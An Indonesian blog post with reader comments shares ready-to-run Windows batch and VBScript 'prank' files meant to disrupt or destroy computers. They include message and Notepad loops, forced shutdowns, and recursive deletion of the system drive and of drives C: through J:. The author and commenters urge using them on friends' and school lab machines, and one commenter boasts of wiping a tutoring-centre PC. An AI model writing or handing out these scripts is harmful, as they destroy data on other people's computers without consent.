You must enable Javascript in your browser to run or open this site.

Collection file.bat & vbs To Destroy the Computer

Pernahkan sobat terpikir bahwa script bisa meruntuhkan Komputer yang begitu perkasa itu? Itu sebuah, bisa! Semua itu bisa terjadi asalkan ada niat dan kemampuan haha. Kerja script script ini adalah menembus program-program komputer dan menggerakannya langsung dari Intinya. Dalam kata lain Semut Kecil masuk telinga sampai ke Otak dan seseorang tiba tiba meninggal [cerita sesungguhnya].

Arti VBS
VBScript atau lengkapnya Visual Basic Scripting Edition adalah sebuah bahasa skrip yang diinterpretasikan saat dieksekusi yang dikembangkan oleh Microsoft Corporation pada tahun 1996. VBS ini sering di gunakan oleh penjelajah web Internet Explorer (dapat digunakan mulai versi Internet Explorer 3.0). VBScript merupakan sebuah bahasa skrip turunan dari bahasa pemrograman Visual Basic for Applications (VBA) yang digunakan di Microsoft Office dan beberapa platform pengembangan buatan Microsoft lainnya.

Arti Bat (Batch)
File batch adalah file teks yang berisi serangkaian perintah yang dimaksudkan untuk dijalankan oleh command interpreter. Ketika sebuah file batch dijalankan, shell Program (biasanya COMMAND.COM atau cmd.exe) membaca file dan mengeksekusi perintah nya, biasanya baris demi baris.

Bila script itu disalah gunakan korban tidaklah bukan adalah Komputer itu sendiri. Sebagai contoh Logikannya bila file.bat yang menjalankan perintah untuk menghapus file system komputer, apa yang terjadi? Terjadi Crash Hebat haha

Sebagai contoh berikut beberapa koleksi Script file.bat dan file.vbs saya :

File BAT.
Copy dan Paste Script .bat di bawah ini → Kemudian Save Script dengan nama.bat
  1. Menulis Pesan Alert Berulang ulang
    @ECHO off
    :Begin
    msg * Komputer Anda Error!
    GOTO BEGIN
  2. Shutdown Komputer + Pesan/Message
    @echo off
    msg * Komputer Anda Mati!
    shutdown -s -c "Error nih!"
  3. Buka Program Notepad terus menerus
    @ECHO off
    :top
    START %SystemRoot%
    \system32\notepad.exe
    GOTO top
  4. Hapus semua data system Komputer dan Komputer menjadi Lambat Total
    @echo off
    del %systemdriver%\*.*/f/s/q
    shutdown -f -r -t 00
  5. Format Ulang Data
    cd/
    rmdir /q /s J:
    rmdir /q /s I:
    rmdir /q /s H:
    rmdir /q /s G:
    rmdir /q /s F:
    rmdir /q /s E:
    rmdir /q /s D:
    del /q /s /f C:
    rmdir /q /s C:
File VBS.
Copy dan Paste Script .bat di bawah ini → Kemudian Save Script dengan nama.bat
  1. CAPS LOCK Error
    Set wshShell
    =wscript.CreateObject
    ("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{CAPSLOCK}"
    loop
  2. CD/DVD Buka tutup Otomatis Terus menerus
    Set oWMP = CreateObject
    ("WMPlayer.OCX.7")
    Set colCDROMs =
    oWMP.cdromCollection
    do
    if colCDROMs.Count >= 1 then
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    For i = 0 to colCDROMs.Count - 1
    colCDROMs.Item(i).Eject
    Next
    End If
    wscript.sleep 5000
    loop
  3. Membuat VB Script muncul terus menerus
    Set wshShell =
    wscript.CreateObject
    ("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "~(enter)"
    loop
  4. Membuat Tombol Backspace terklik terus menerus
    Set wshShell
    =wscript.CreateObject
    ("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop
  5. Mengetik Kata yang di inginkan terus menerus
    Set wshShell =
    wscript.CreateObject
    ("WScript.Shell")
    do
    wscript.sleep 100
    wshshell.sendkeys "Error, Error, Error!"
    loop
Setelah usai di beri nama coba Sobat Klik 2x file.bat atau file.vbs tersebut!
NB : Tanggung Jawab pemakai. Disini saya hanya berbagi ilmu tersebut :)

115 comments

  1. Indahnya PERTAMAX,, =)) =))

    BalasHapus
  2. lg gk minat mempelajarinny mas, mungkin ntar SMK :)

    BalasHapus
  3. wokwowkowk,, VB dasar inimah,, =)) =)) btw anyway busway keren juga tuh, utk ngerjain temen,, wowkowkwok,, =)) =))

    BalasHapus
  4. Hahaha... gimana ya kalo aku taruh kode diatas di lab komputer wkwkwk....

    BalasHapus
  5. jiaaaahhhh... pertamaxnya udah direbut ama si Rama....

    hemmmmmmmmmmm.....

    ketinggalan dech... hihihi...
    nyimak dulu ach...

    BalasHapus
  6. jahahaa... bener apa kata rama... seru banget buat ngerjain temen ini sob... mantab.....

    BalasHapus
  7. Apapun tentang semuanya,. yang pasti tetaplah ilmu bagi semua orang,. mau lama atau terbaru,, yang penting bermanfaat,.

    BalasHapus
  8. @Art -->> Hehe... betul sob... bermanfaat bua ngerjain temen ya...

    ihihihi

    BalasHapus
  9. To Rama : selamat pertamaxnya :D
    To Cek Info : mau masuk SMK? kenapa gak SMA?
    To Rama lagi : hahahaha ahli VB ya? silahkan di praktekan di teman :P
    To Musa : wkwkwk guru kamu marah ntar? biarin dah lanjoooeett!
    To Abdu Green : hahahaha rama emang marug kk :P

    BalasHapus
  10. To Abdu Green : wkowkowkw bisa aja lo :D kerjain saana temen lo :P di jamin mempererat tali persaudaarn =))
    To Art : amiiinnn semoga bermanfaat :)

    BalasHapus
  11. wah mantab nih, dapet ilmu baru dari sini. Saya juga sering menggunakan filebat buat ngunci folder dll. Mantab deh pokoknya.

    BalasHapus
  12. Nice post sob,happy blogging

    BalasHapus
  13. To DAW-XP : bisa untuk kunci file folder juga ya? :D wahhh mantap
    To Er'end : thanks
    To Ijal Fauzi : silahkan disimak :)

    BalasHapus
  14. soal ini ane pernah nulis

    http://dhiibhiehh.blogspot.com/2011/05/memproteksi-folder-tanpa-software.html

    manteb deh sob! :)

    BalasHapus
  15. haha ane udah pernah coba :p manteb banget tuh..

    BalasHapus
  16. ris contohin di komputer lu coba =))

    BalasHapus
  17. woh penuh tutorial terus makin betah berkunjung kesini. tukeran link ya... aku masukin ke bloggrolku.

    BalasHapus
  18. manteb sob,,, saya akan coba buat Cool Hierarchy List Menu dari sobat,,,sekalian follow

    BalasHapus
  19. Wah mantep nih, di bookmark dulu deh B)

    BalasHapus
  20. oh ini toh script yg suka bikin repot komputer? wah baru tau nih gan...thanks gan share infonya!

    BalasHapus
  21. lumayan sob buat ngisengin temen :D

    BalasHapus
  22. Gimana rasanya yah kalau komputer kita dikerjain seperti ini hehehehe....Bisa langsung dibawa ke tukang reparasi nih kan tidak mudengan sama komputer

    BalasHapus
  23. seep lengkap banget file .bat plus VBscripnya sob,, bisa pake isengin teman,, wkwkwkwkwk

    peace sobat..

    BalasHapus
  24. Kunjungan silaturahmi pahi sahabat di sini kembali dan mendapatkan trik baru lagi nih.Terima kasih atas berbagi trik nya sahabat

    BalasHapus
  25. Wah,yg ginian ntar ngak ke detect Virus apa Faris?
    Ngak pernah main Vb :D

    BalasHapus
  26. To Bayu : hahaha bisa juga ya mengunci folder dengan bat :)) mantap!
    To MbahQopets : hahaha ane juga dah pernah :P
    To Koko : gua udah pernah yang kata nulis terus terusan :)) asem
    To Baha Andes : Ane cek di blog ente gak ada link ane sob :))
    To HAUSGAME : thanks sob :) silahkan di cobain Cool Hirarki Menunya :D
    To SHUDAI AJLANI (dot) COM : hehehe abis bookmark di cobain ke kompi ente :))
    To komunitas oejoeng : hahahaha :D silahkan di praktekan :D
    To A-NX : wkwkwkwkw boleh boleh tuh! SILAHKAN DI PRAKTEKAN :))
    To cardiacku : tukang reparasi mungkin gak ngerti kali sob :)) hahaha
    To Asis Sugianto : wkwkwkw iya ane koleksikan :P peace juga :P silahkan jadikan teman sobat menjadi korban =))
    To webmdmk : iya sob terimakasih juga sudah mau datang dan brkomentar
    To Wirang geni : gak kedetect om ini :D hahaha kayaknya

    BalasHapus
  27. bener sob,, ya contoh kecil juga kalau kita salah menambah sript di template blog,, kan juga error tuh blog kita,, info yg bagus sob,, trims

    BalasHapus
  28. mudah2an gak disalahgunakan oleh orang yang tidak bertanggung jawab hahah

    Salam,
    Kevin
    Blog : www.nostalgia-90an.com
    Nostalgia Segala Sesuatu pada Tahun 90an.

    BalasHapus
  29. walah begitu ye jadinye,hahahaha.sharenya mantab ne. idisi oprex script berikutnya ditunggu.. thnks. happy blogging

    BalasHapus
  30. To al kahfi : iya contoh kecilnya seperti itu, tidak valid lah :D hahaha makasih ya kunjungannya :)
    To Kevin : hahaha iya tuh bener jangan sampe deh :D
    To Zhinto : ya sob.
    zhinto : hehehee thanks ya sob supportnya :) ane akan post secepatnya :)

    BalasHapus
  31. nggak ngerti mas.. ndeso nih ....
    bisa-bisa error smua dhe' .... :D

    BalasHapus
  32. iya bisa, asalkan tau kodenya. :D
    oh ya ada post baru nih di blogku, post sederhana kok. :)

    BalasHapus
  33. Blogmu bener2 bagus.. Q suka yg sederhana tpi mnarik.. ;)

    oia, klo butuh software baru ma crack, kunjungi aja blogku di http://lord-dhu.blogspot.com

    BalasHapus
  34. wah sangat bermanfaat ilmu yg saya serap darimu, sayang aku terlmbat hmmmm mantab...

    BalasHapus
  35. wuasemmm ane jelek mulu dimata kalian,, :(( :((

    BalasHapus
  36. Waduw... Ayas gak ikut2an aah... lagian Gue gak ngerti ma gituan Sob!!!
    Hwehehee... Moga aja gak disalah gunain deh, biaar aman terkendali!!
    ^_^

    BalasHapus
  37. hhe bermanfaat banget niih
    asal jgn di salah gnakan bwat implementasi yg jahat kyk program usil2an :D

    makasih atas kunjungannya tiap hari :)

    BalasHapus
  38. wah saya ngeri nih beginian nanti adanya gk bisa pakai lagi ~x(

    BalasHapus
  39. Saya tidak nyambung gan!
    Hehehe..
    Lelet banget otaknya saya dalam hal begituan mas..
    Semoga bisa bermanfaat untuk yang membutuhkan,

    BalasHapus
  40. To Shinobi : wakwkawka bagus dhe kalau error semua :P
    To DAW-XP : ohhh tak kira udah ada kodenya :P oke TKP
    To tretans : wahhhh sungguh komentar yang luar biasa :D thanks ya supportnya :) segera ke TKP untuk mendapatkan software :))
    To anisayu : hehehe silahkan diserap :) ilmu di buat agar diamalkan :)
    To Rama : maksudnya apa dah Ra :-/ orang gak kenapa naa juga
    To BagiBagiBlog : hahahaha ati ati sob menggunakannya, ntar jadi boomerang lagi :D
    To How To Be Vegetarian : iya sob hahahaha ntar kena karma nih :P
    To richard : wkowkwokw ati ati makanya sob

    BalasHapus
  41. To Kopiah Putih : wahhhh masa gak ngerti bro, :D tingga kopas jadi :D

    BalasHapus
  42. hahaha ane biasanya pake buat ngerjain temen :D

    BalasHapus
  43. Kunjungan siang nih..
    Salam dari saya :)

    Danu Akbar

    BalasHapus
  44. baiklah akan kuserap atas ijinmu hehhe

    BalasHapus
  45. hmmm resiko ditanggung sendiri yaa :))

    BalasHapus
  46. waduhhh kalau jadi lambat total.. terus apa gunanya kita pake kompi ya?!?!??!

    BalasHapus
  47. Apa yang tak mungkin di dunia ini akhirnya meruntuhkan komputer raksasa juga OK.Izin nyimak.Trims infonya ^_^

    Silahkan Mampir ^_^

    BalasHapus
  48. wah, mantep uy, ada script yg bisa merusak komputer, Nice info Sob ... :D

    BalasHapus
  49. ngeriii....
    boleh dicoba di komputer temen nh,,,
    WKAKAKAKAKAKA

    BalasHapus
  50. To Mbah Qopet : wahhhhh silahkan tuh bagus bagus, tapi resiko di LU :))
    To Danu Akbar : ya
    To blog alternative : sama sama gan infonya thanks ya kunjungannya :)
    To pri crimbun : yyaaahh jangan disimak dong, praktekin :)) wkwkw
    To anisayu : hahahaha :D silahkan diserap
    To Nurmayanti Zain : iyalah masa blog ini :)) kan udah ada labelnya "Tangung Jawab Pemakai" wkwokwo
    To Majalah Masjid Kita : wkowkow makanya buang aja sob ke tong sampah :D
    To Bisnis Online Blog : hahahaha thanks ralatnya sob :)) sama sama, langsung TKP sob
    To EKA : iya ini scriptnya yang ngerusak komputer apa bila di klik 2x :)) wkwkwk
    To Windows 7 Blog : wkwkwkwk silahkan dicobain sob scriptnya, biar skarat temen ente =))

    BalasHapus
  51. gua pernah coba kode yang ngehapus data di komputer tempat les gua tapi cuman gua save gak nyampe gua klik 2 kali eh pas di klik dua kali ama temen gua =)) item semua

    BalasHapus
  52. Kalau script,yg bs jlan d jarngan warnet ada ngak?
    Misal akses internet kita yg lbh cepet,yg lain biar kayak keong :-/
    D share ya kalau ada :D

    BalasHapus
  53. bisaa dunks sob :P :D

    nimbrung dimari nunggu post anyar .

    BalasHapus
  54. sekarang datang untuk menghisap haha

    BalasHapus
  55. ada award dari ane bro,, silahkan di ambil ya,, =)) =))

    BalasHapus
  56. Sebegitu dahsyatnya kah ?? Baru tahu tentang kehebatan script.

    BalasHapus
  57. Tengok Farisantips pagi2,di minggu pagi ;;)

    BalasHapus
  58. To koko : luuuu parah banget lu :D wkwokw =))
    To aku mau gratisan : jiaaahhh lain script itu sob :D itu sejenis hack jaringan :D
    To Bayu : silahkan di tunggu selama mungkin :D ane lagi agak sibuk nih bro :D
    To anisayu : silahkan di hisab hisab :))
    To Rama88 : waahhh dapet award lagi, malah 10 blog deal dapet semua ya :-/ wwkwokwowkow :))
    To Bengkel Bangun : hahaha iya sob dahsyat RCTI banget tuh =))
    To Wirang geni : wahhh jangan di tengok tengok kk :))

    BalasHapus
  59. haha :)) komputernya masih rusak sampai sekarang =))

    BalasHapus
  60. beneran ris :D untung gak ada yang tahu gua sama temen gua yang ngerusakin =))

    BalasHapus
  61. dulu pernah juga sob dapat script2 kek gitu dari sahabat, tapi tetep saja ogah mo nyoba.. lha wong komputer saya fine2 saja, mosok mo dirusak.. hahahahaha

    BalasHapus
  62. 69th comment ...
    sekalian nongkrong disini, sapa tau nnti di kasih uang receh ... =))

    BalasHapus
  63. mantabz abis mas bro, makasih sharenya

    BalasHapus
  64. To dhenok habibie : wkowkwo jangan sampe ke klik aja bro :D haha boleh sih boleh file itu di kompi tapi jangan di klik aja :D
    To Danu Akbar : hahahaha kalo gak iseng gak seru :))
    To Shinobi : wakwkak tak kasih butiran receh nih bro :-o wkowkoww =)) jangan melas gitu dong om tampangnya :))
    To @ Warkop Aremania : thanks ya mas komen yang bermuatan itu :)

    BalasHapus
  65. habis dihisab diterapkan ya hihi

    BalasHapus
  66. Wah, itu program virus ya, Gan? :-t

    BalasHapus
  67. To anisayu : wkwkwk anchur anchur dah kompi mba :P
    To nandobase : hahahaha sejenis aja sob tapi bukan virus :))

    BalasHapus
  68. Pertama kenal komputer gw tertarik banget sama pemrograman batch n vbs, mencoba2 mengenal script virus dan memanipulasi virus :P . Wah ane jadi tertarik lagi nihh pengen ngoprek vb

    BalasHapus
  69. wah ini ma buat ngrusak pc, tapi bagus juga sob buat mempelajari visual basic

    BalasHapus
  70. Semut Kecil masuk telinga sampai ke Otak dan seseorang tiba tiba meninggal .... Ni Mau Ngrusak Pc Ya hahahahaha

    BalasHapus
  71. ijin Follow Gan..........!!!!

    BalasHapus
  72. To Se Avancee : wah ahli dalam bidang bacth n vbs nih :D ane kenal bat dari kk ane jago kompi :D huahahaha
    To Liandri : wakowakowa buat di praktekin ke sobat aja :P
    To Arndi : iya tuh sob udah pernah kejadian di dunia ini :( bahahahah rusak aja sob kompimu :)) ane dah follow kan? thjanks nya

    BalasHapus
  73. belum sempet buat sob Cool Hirarki Menunya malah ke jogja, jalan2

    BalasHapus
  74. ternyata bis mem destroy komputer ya hmm hebat2 gan

    BalasHapus
  75. Tak simpan sebatas pengetahuan saja !
    Nggak berani coba-coba untuk hal yang justru akan merugikan..he..he..he !

    BalasHapus
  76. Ya,kalau di coba di komputer sendiri bisa Mleduk Kompi kita... ~x( .:D

    BalasHapus
  77. waaaa... mumet palaku lihat scriptnya bro ... =))

    BalasHapus
  78. Mas, hebat blog mu ini !
    ga nyangka aku bisa baca ini, kebetulan aku juga lagi dipusingkan sama hal dibawah ini, mungkin bisa bantu :

    "error running scripts on this page"
    udah banyak langkah yang aku upayakan seperti : buka internet option (trus kubuka advanced, klik 'browse', juga update javascritp, recovery windows, scan virus, update widows, semuanya KAGA' NGARiUH dan tulisan itu tetep nongol, search google jadi ga normal, YM apa lagi, juga beberapa fasilitas yang harusnya bisa kita klik jadi kaga bisa, puyenggggg aku Mas.

    Bisa minta tolong advisnya.
    Makasih.

    BalasHapus
  79. wahhh rame bgt yg koment,, =)) =)) ikutan ramein ahh,, =)) =))

    BalasHapus
  80. nyimak sob, trnyata mantabs.. :D

    BalasHapus
  81. To >>>ichwan HAUSGAME : ohhhh gak apa apa sob :D wahh lagi di jogja ya :))
    To bopfive : wakwakwka ya bisa sob :D resiko di mas ya :D
    To Prapatan Kretek : hahaha ini sekedar pengetahuan aja sob :P
    To Wirang Geni : wakwakwka makanya resiko di tanggung sendiri ya :D jangan pas rusak minta betulin sama ane :))
    To Shinobi Caemk : hahahahaaha biar gak mumet tidur aja bro :))
    To Obrolan Blogger.com : iya sob ane juga dah pernah seperti itu, error running script on this page. itu artinya ada javascript yang fungsinya tidak kompatibel sama browser kita. saran ane di copot deh sob javascriptnya :)
    To Rama88 : ramean blog sampean :D
    To wongcrewchild : hihihi mantap ya? cobain dah :P jangan salahkan ane ya kenapa kenapa =))
    To blog alternativ : oke sob, thanks ya :)

    BalasHapus
  82. ini mahhh,, jadi boomerang nih -__- haha nice TIP!!!...

    BalasHapus
  83. To _ciids : apaan yang ribet nih :D kan tinggal di kopas aja :D
    To Anonim : jiaah itu kalau orangnya gak teliti :D thanks ya bro dah berkunjung :)

    BalasHapus
  84. Tipsnya bagus kawan...kalau dipraktekkan bisa membuat kawan jadi super bingung kali...

    BalasHapus
  85. wah telat lagi nihhh

    yang ingin saya tanyakan, bila komputer termakan oleh kode itu, bisakah kembali ke kondisi semula? dengan kode semacam ini juga......
    =))

    BalasHapus
  86. Bisa untuk meledek ke teman nih kodenya

    BalasHapus
  87. wahhh sama neh sob ane juga lagi sibuk , , :P :P :D

    tolong di bilangin temen-temen grup FB ya sob, ane jarang OL di FB tapi tetep BW kok :)
    soalnya kuota modem mw habis neh jadinya ya cari aman aja biar lancar BWnya sob :)

    BalasHapus
  88. To ibnusiswoyo : jangan di simak doang sob klalau perlu praktek :))
    To blog-nailah : wkowkowkw prustasi tepatnya :D
    To earth-inside : wkkwkw makanya rajin rajin BW :D kode kode itu bisa kembali sperti semula pas sehabis restar, karna vbs dan bat berupa program aplikasi juga lho. kecuali yang format ulang dan komputer lambat :))
    To abufarras : wkwokow lebih dari itu :P
    To bayu : gak apa apa sob :) BW udah bisa kok sob :)

    BalasHapus
  89. Wkwkwk... File bat ya sob, jadi inget jaman dos dulu saat otak atik autoexec bat hehe... Tq ilmunya sobat n tq dah brkunjung ke blogku.

    BalasHapus
  90. wahhhh ahli dos dosan ya sob :D kalau ahli dosa jangan ya sob :)) iya sama sama :)

    BalasHapus
  91. lumayan nih buat ngerjain temen.. wkwkwkwkwk
    thanks sharenya mas :)

    BalasHapus
  92. manteb sob bener2 bagus wat ngerjain temen he he

    BalasHapus
  93. gua sih udah bisa gitu gituin teemen pake script batch yang lain,, thanks dah sharnya

    BalasHapus
  94. keren nih....
    kira-kira ada nggak script buat bikin hp jadi error?

    BalasHapus
  95. To glownews : huahahhaa iya bener banget tuh sob :))
    To anonim : waw hebat juga ya kamu :)
    To Rumah Jogja : tar dulu sepertinya ada saya cari cari aja dahulu :)

    BalasHapus
  96. masih dalam proses percobaan :D

    BalasHapus
  97. pandai juga sob maen vb nya :D, lumayan neh buat ngerjain tempat praktek ane =))

    BalasHapus
  98. To Deganshah Putra : hehehe gak pandai pandai juga kok sob :) wkwokwokwo kacau lo gan :))

    BalasHapus
  99. wah keren2... jahil.mode.on hahaha

    BalasHapus
  100. To wahyu : hehehe iya nih sob, jgn di praktekan di sendiri ya :))

    BalasHapus
  101. lumayan nih bwt iseng2 kepada komputer temen..

    BalasHapus